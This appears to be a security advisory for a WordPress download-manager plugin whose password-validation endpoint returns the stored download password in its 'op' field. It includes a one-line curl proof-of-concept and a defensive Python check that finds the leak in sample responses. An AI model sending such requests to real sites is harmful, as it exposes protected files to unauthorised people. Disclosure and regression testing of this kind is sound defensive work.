Description

The plugin does not protect the passwords of file downloads: when it receives an invalid password, it leaks the stored one.

With 223 being the ID of a password-protected download:
curl -X POST --data '__wpdm_ID=223&dataType=json&execute=wpdm_getlink&action=wpdm_ajax_call&password=123322' https://example.com/wp-json/wpdm/validate-password
The response will contain the password in the 'op' field.
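A regression check a site owner can run against a captured response after updating the plugin, given here as an added example and not as code from the plugin or from the original advisory. It reports every place in the response to a deliberately wrong guess where the real download password appears, including the 'op' field; the function names, the sample password and the response fields other than 'op' are assumptions, and the sample bodies are constructed.

```python
import json


def find_leaks(value, secret, path="$"):
    """Return the JSON path of every string in `value` that contains `secret`."""
    hits = []
    if isinstance(value, dict):
        for key, child in value.items():
            hits += find_leaks(child, secret, f"{path}.{key}")
    elif isinstance(value, list):
        for i, child in enumerate(value):
            hits += find_leaks(child, secret, f"{path}[{i}]")
    elif isinstance(value, str) and secret in value:
        hits.append(path)
    return hits


def audit_response(body, real_password, submitted_password):
    """Audit one response body returned for a deliberately wrong password."""
    if real_password == submitted_password:
        raise ValueError("submit a wrong password for this check")
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        # Not JSON (e.g. an HTML error page): fall back to a raw substring check.
        return ["<raw body>"] if real_password in body else []
    return find_leaks(doc, real_password)


# Constructed sample data: only the 'op' field name comes from the advisory,
# the other fields and the password value are made up for illustration.
REAL = "Tr0ub4dor-constructed"
VULNERABLE = json.dumps({"success": False, "op": REAL})
PATCHED = json.dumps({"success": False, "message": "Wrong password"})

if __name__ == "__main__":
    for name, body in (("vulnerable", VULNERABLE), ("patched", PATCHED)):
        leaks = audit_response(body, REAL, "123322")
        print(name, "LEAK at " + ", ".join(leaks) if leaks else "ok")
```

A non-empty result means the endpoint still discloses the password to anyone who submits a wrong one.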